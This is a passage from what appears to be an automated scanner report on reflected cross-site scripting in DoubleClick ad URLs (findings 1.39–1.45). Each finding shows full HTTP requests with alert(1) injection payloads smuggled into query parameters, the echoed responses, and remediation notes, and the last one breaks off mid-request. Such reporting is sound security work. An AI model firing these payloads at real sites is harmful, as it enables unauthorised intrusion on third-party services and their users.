Date: Tue, 28 Jun 2011 03:09:56 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-
...[SNIP]...
5050_KatieMike_300x250.jpg';
var dccreativewidth = '300';
var dcwmode = 'opaque';
var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=97167453-6c97-4c7b-b94f-9a7ce14497eb&_o=17282944&_eo=97956&_et=1309230488db96c'-alert(1)-'befe711ab0a&_a=17328950&_s=11683&_d=17330108&_c=17286405&_pm=97956&_pn=17331365&redirect=http%3a%2f%2frts.alldayslim.com/p/fa760703%3Favpzid%3D1018%26avpmid%3D7004%26avppid%3D653%26avpcid%3D3736%26avpaid%3D337%26
...[SNIP]...

1.39. http://ad.doubleclick.net/adi/x1.rtb/alldayslim/ron [_o parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/alldayslim/ron

Issue detail

The value of the _o request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a3423'-alert(1)-'c547628938b was submitted in the _o parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/alldayslim/ron;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=97167453-6c97-4c7b-b94f-9a7ce14497eb&_o=17282944a3423'-alert(1)-'c547628938b&_eo=97956&_et=1309230488&_a=17328950&_s=11683&_d=17330108&_c=17286405&_pm=97956&_pn=17331365&redirect=;u=17331365;ord=9530323? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLsQ0CMQwF0A8HKKdbgw5ZImcnjgegpaU-J6ajYxgGYFDE69-CHYCzaa4qhal2U5KuTm7yJNu0RxYxDU_Y3-fbZ8H0Hy6be1QmjqakoxiNXIOa8MhrMb62SDgAekk4At9Xwgl4P_ADwRkDtXMAAAA%3D%26dst%3Dhttp%253A%252F%252Fwww.alldayslim.com&_wp=AAABMNQ33gS2zlTVJGnWaGtLEK3X84GBah6Scw&_nv=1&_CDbg=17328950&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAADZrCAEAAAAAvG8IAQAAAAAFxQcBAAAAAKV0CAEAAAAAp3AIAQAAAACocAgBAAAAACND7EEfhetRuB7tPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA5NzE2NzQ1My02Yzk3LTRjN2ItYjk0Zi05YTdjZTE0NDk3ZWIkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAJhFCU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4614
Date: Tue, 28 Jun 2011 03:09:08 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-
...[SNIP]...
s0.2mdn.net/3126678/SLIM_5050_KatieMike_300x250.jpg';
var dccreativewidth = '300';
var dcwmode = 'opaque';
var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=97167453-6c97-4c7b-b94f-9a7ce14497eb&_o=17282944a3423'-alert(1)-'c547628938b&_eo=97956&_et=1309230488&_a=17328950&_s=11683&_d=17330108&_c=17286405&_pm=97956&_pn=17331365&redirect=http%3a%2f%2frts.alldayslim.com/p/fa760703%3Favpzid%3D1018%26avpmid%3D7004%26avppid%3D653%26avpcid
...[SNIP]...

1.40. http://ad.doubleclick.net/adi/x1.rtb/alldayslim/ron [_pm parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/alldayslim/ron

Issue detail

The value of the _pm request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb5b1'-alert(1)-'8ffdd34280f was submitted in the _pm parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/alldayslim/ron;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=97167453-6c97-4c7b-b94f-9a7ce14497eb&_o=17282944&_eo=97956&_et=1309230488&_a=17328950&_s=11683&_d=17330108&_c=17286405&_pm=97956cb5b1'-alert(1)-'8ffdd34280f&_pn=17331365&redirect=;u=17331365;ord=9530323? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLsQ0CMQwF0A8HKKdbgw5ZImcnjgegpaU-J6ajYxgGYFDE69-CHYCzaa4qhal2U5KuTm7yJNu0RxYxDU_Y3-fbZ8H0Hy6be1QmjqakoxiNXIOa8MhrMb62SDgAekk4At9Xwgl4P_ADwRkDtXMAAAA%3D%26dst%3Dhttp%253A%252F%252Fwww.alldayslim.com&_wp=AAABMNQ33gS2zlTVJGnWaGtLEK3X84GBah6Scw&_nv=1&_CDbg=17328950&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAADZrCAEAAAAAvG8IAQAAAAAFxQcBAAAAAKV0CAEAAAAAp3AIAQAAAACocAgBAAAAACND7EEfhetRuB7tPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA5NzE2NzQ1My02Yzk3LTRjN2ItYjk0Zi05YTdjZTE0NDk3ZWIkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAJhFCU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4608
Date: Tue, 28 Jun 2011 03:11:51 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-
...[SNIP]...
';
var dcwmode = 'opaque';
var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=97167453-6c97-4c7b-b94f-9a7ce14497eb&_o=17282944&_eo=97956&_et=1309230488&_a=17328950&_s=11683&_d=17330108&_c=17286405&_pm=97956cb5b1'-alert(1)-'8ffdd34280f&_pn=17331365&redirect=http%3a%2f%2frts.alldayslim.com/p/fa760703%3Favpzid%3D1018%26avpmid%3D6954%26avppid%3D653%26avpcid%3D3736%26avpaid%3D337%26sid%3D744';
var target = '_blank';
var dcbgcolor = '';

...[SNIP]...

1.41. http://ad.doubleclick.net/adi/x1.rtb/alldayslim/ron [_pn parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/alldayslim/ron

Issue detail

The value of the _pn request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 42fa3'-alert(1)-'a131aad650a was submitted in the _pn parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/alldayslim/ron;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=97167453-6c97-4c7b-b94f-9a7ce14497eb&_o=17282944&_eo=97956&_et=1309230488&_a=17328950&_s=11683&_d=17330108&_c=17286405&_pm=97956&_pn=1733136542fa3'-alert(1)-'a131aad650a&redirect=;u=17331365;ord=9530323? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLsQ0CMQwF0A8HKKdbgw5ZImcnjgegpaU-J6ajYxgGYFDE69-CHYCzaa4qhal2U5KuTm7yJNu0RxYxDU_Y3-fbZ8H0Hy6be1QmjqakoxiNXIOa8MhrMb62SDgAekk4At9Xwgl4P_ADwRkDtXMAAAA%3D%26dst%3Dhttp%253A%252F%252Fwww.alldayslim.com&_wp=AAABMNQ33gS2zlTVJGnWaGtLEK3X84GBah6Scw&_nv=1&_CDbg=17328950&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAADZrCAEAAAAAvG8IAQAAAAAFxQcBAAAAAKV0CAEAAAAAp3AIAQAAAACocAgBAAAAACND7EEfhetRuB7tPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA5NzE2NzQ1My02Yzk3LTRjN2ItYjk0Zi05YTdjZTE0NDk3ZWIkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAJhFCU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4602
Date: Tue, 28 Jun 2011 03:12:15 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-
...[SNIP]...
e = 'opaque';
var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=97167453-6c97-4c7b-b94f-9a7ce14497eb&_o=17282944&_eo=97956&_et=1309230488&_a=17328950&_s=11683&_d=17330108&_c=17286405&_pm=97956&_pn=1733136542fa3'-alert(1)-'a131aad650a&redirect=http%3a%2f%2frts.alldayslim.com/p/fa760703%3Favpzid%3D1018%26avpmid%3D6972%26avppid%3D653%26avpcid%3D3736%26avpaid%3D337%26sid%3D744';
var target = '_blank';
var dcbgcolor = '';
var dcswf = '
...[SNIP]...

1.42. http://ad.doubleclick.net/adi/x1.rtb/alldayslim/ron [_s parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/alldayslim/ron

Issue detail

The value of the _s request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f823e'-alert(1)-'1fb1ebda1f6 was submitted in the _s parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/alldayslim/ron;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=97167453-6c97-4c7b-b94f-9a7ce14497eb&_o=17282944&_eo=97956&_et=1309230488&_a=17328950&_s=11683f823e'-alert(1)-'1fb1ebda1f6&_d=17330108&_c=17286405&_pm=97956&_pn=17331365&redirect=;u=17331365;ord=9530323? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLsQ0CMQwF0A8HKKdbgw5ZImcnjgegpaU-J6ajYxgGYFDE69-CHYCzaa4qhal2U5KuTm7yJNu0RxYxDU_Y3-fbZ8H0Hy6be1QmjqakoxiNXIOa8MhrMb62SDgAekk4At9Xwgl4P_ADwRkDtXMAAAA%3D%26dst%3Dhttp%253A%252F%252Fwww.alldayslim.com&_wp=AAABMNQ33gS2zlTVJGnWaGtLEK3X84GBah6Scw&_nv=1&_CDbg=17328950&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAADZrCAEAAAAAvG8IAQAAAAAFxQcBAAAAAKV0CAEAAAAAp3AIAQAAAACocAgBAAAAACND7EEfhetRuB7tPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA5NzE2NzQ1My02Yzk3LTRjN2ItYjk0Zi05YTdjZTE0NDk3ZWIkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAJhFCU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4614
Date: Tue, 28 Jun 2011 03:10:43 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-
...[SNIP]...
0.jpg';
var dccreativewidth = '300';
var dcwmode = 'opaque';
var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=97167453-6c97-4c7b-b94f-9a7ce14497eb&_o=17282944&_eo=97956&_et=1309230488&_a=17328950&_s=11683f823e'-alert(1)-'1fb1ebda1f6&_d=17330108&_c=17286405&_pm=97956&_pn=17331365&redirect=http%3a%2f%2frts.alldayslim.com/p/fa760703%3Favpzid%3D1018%26avpmid%3D6971%26avppid%3D653%26avpcid%3D3736%26avpaid%3D337%26sid%3D744';
var targe
...[SNIP]...

1.43. http://ad.doubleclick.net/adi/x1.rtb/alldayslim/ron [redirect parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/alldayslim/ron

Issue detail

The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 298a7'-alert(1)-'14caee42673 was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

In this request the payload replaced the empty redirect= value at the end of the nested click URL, and the trailing ;u=17331365;ord=9530323? segment was not sent. The response shows the ad server concatenating its own click-through destination (http://rts.alldayslim.com/p/fa760703?...) directly after the payload, without the percent-encoding seen in the other responses for this path; the reflection point is the same var imgurl = '...' literal.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/alldayslim/ron;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=97167453-6c97-4c7b-b94f-9a7ce14497eb&_o=17282944&_eo=97956&_et=1309230488&_a=17328950&_s=11683&_d=17330108&_c=17286405&_pm=97956&_pn=17331365&redirect=298a7'-alert(1)-'14caee42673 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLsQ0CMQwF0A8HKKdbgw5ZImcnjgegpaU-J6ajYxgGYFDE69-CHYCzaa4qhal2U5KuTm7yJNu0RxYxDU_Y3-fbZ8H0Hy6be1QmjqakoxiNXIOa8MhrMb62SDgAekk4At9Xwgl4P_ADwRkDtXMAAAA%3D%26dst%3Dhttp%253A%252F%252Fwww.alldayslim.com&_wp=AAABMNQ33gS2zlTVJGnWaGtLEK3X84GBah6Scw&_nv=1&_CDbg=17328950&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAADZrCAEAAAAAvG8IAQAAAAAFxQcBAAAAAKV0CAEAAAAAp3AIAQAAAACocAgBAAAAACND7EEfhetRuB7tPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA5NzE2NzQ1My02Yzk3LTRjN2ItYjk0Zi05YTdjZTE0NDk3ZWIkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAJhFCU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4467
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 28 Jun 2011 03:12:32 GMT
Expires: Tue, 28 Jun 2011 03:12:32 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-
...[SNIP]...
e';
var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=97167453-6c97-4c7b-b94f-9a7ce14497eb&_o=17282944&_eo=97956&_et=1309230488&_a=17328950&_s=11683&_d=17330108&_c=17286405&_pm=97956&_pn=17331365&redirect=298a7'-alert(1)-'14caee42673http://rts.alldayslim.com/p/fa760703?avpzid=1018&avpmid=6990&avppid=653&avpcid=3736&avpaid=337&sid=744';
var target = '_blank';
var dcbgcolor = '';
var dcswf = 'http://s0.2mdn.net/3126678/SLIM_Quiz_Spo
...[SNIP]...

1.44. http://ad.doubleclick.net/adi/x1.rtb/alldayslim/ron [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/alldayslim/ron

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 67ac6'-alert(1)-'f3abb855eac was submitted in the sz parameter. This input was echoed unmodified in the application's response.

In the request shown, the payload is not appended to sz=300x250 but to the end of the _f value inside the nested click URL (_f=97167453-6c97-4c7b-b94f-9a7ce14497eb67ac6'-alert(1)-'f3abb855eac). The scanner's attribution to sz reflects how it parsed the ;-delimited path segment; the reflection point is the same var imgurl = '...' literal as in the other findings for this path, so the finding stands whichever parameter name is recorded.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/alldayslim/ron;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=97167453-6c97-4c7b-b94f-9a7ce14497eb67ac6'-alert(1)-'f3abb855eac&_o=17282944&_eo=97956&_et=1309230488&_a=17328950&_s=11683&_d=17330108&_c=17286405&_pm=97956&_pn=17331365&redirect=;u=17331365;ord=9530323? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLsQ0CMQwF0A8HKKdbgw5ZImcnjgegpaU-J6ajYxgGYFDE69-CHYCzaa4qhal2U5KuTm7yJNu0RxYxDU_Y3-fbZ8H0Hy6be1QmjqakoxiNXIOa8MhrMb62SDgAekk4At9Xwgl4P_ADwRkDtXMAAAA%3D%26dst%3Dhttp%253A%252F%252Fwww.alldayslim.com&_wp=AAABMNQ33gS2zlTVJGnWaGtLEK3X84GBah6Scw&_nv=1&_CDbg=17328950&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAADZrCAEAAAAAvG8IAQAAAAAFxQcBAAAAAKV0CAEAAAAAp3AIAQAAAACocAgBAAAAACND7EEfhetRuB7tPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA5NzE2NzQ1My02Yzk3LTRjN2ItYjk0Zi05YTdjZTE0NDk3ZWIkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAJhFCU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4602
Date: Tue, 28 Jun 2011 03:08:49 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-
...[SNIP]...
dcgif = 'http://s0.2mdn.net/3126678/SLIM_Wipe_Katie_300x250.jpg';
var dccreativewidth = '300';
var dcwmode = 'opaque';
var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=97167453-6c97-4c7b-b94f-9a7ce14497eb67ac6'-alert(1)-'f3abb855eac&_o=17282944&_eo=97956&_et=1309230488&_a=17328950&_s=11683&_d=17330108&_c=17286405&_pm=97956&_pn=17331365&redirect=http%3a%2f%2frts.alldayslim.com/p/fa760703%3Favpzid%3D1018%26avpmid%3D7014%26avppid%3D
...[SNIP]...

1.45. http://ad.doubleclick.net/adi/x1.rtb/allstate/poem1 [_c parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/allstate/poem1

Issue detail

The value of the _c request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1eaf6"-alert(1)-"1c881d63b74 was submitted in the _c parameter. This input was echoed unmodified in the application's response.

For the allstate/poem1 creative the nested click URL is reflected inside a double-quoted string literal that is closed by "); immediately before var fscUrl = url;, so the payload uses a double quote rather than the single quote that terminates the literal in the alldayslim/ron creative. The same context holds for the _eo, _o, _pm and _pn findings for this path.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/allstate/poem1;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=e3c21e8b-5821-4f72-aba5-f7c02835f77e&_o=15719&_eo=97956&_et=1309226708&_a=17087056&_s=11683&_d=17473217&_c=170805091eaf6"-alert(1)-"1c881d63b74&_pm=97956&_pn=17474528&redirect=;u=17474528;ord=2507911? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
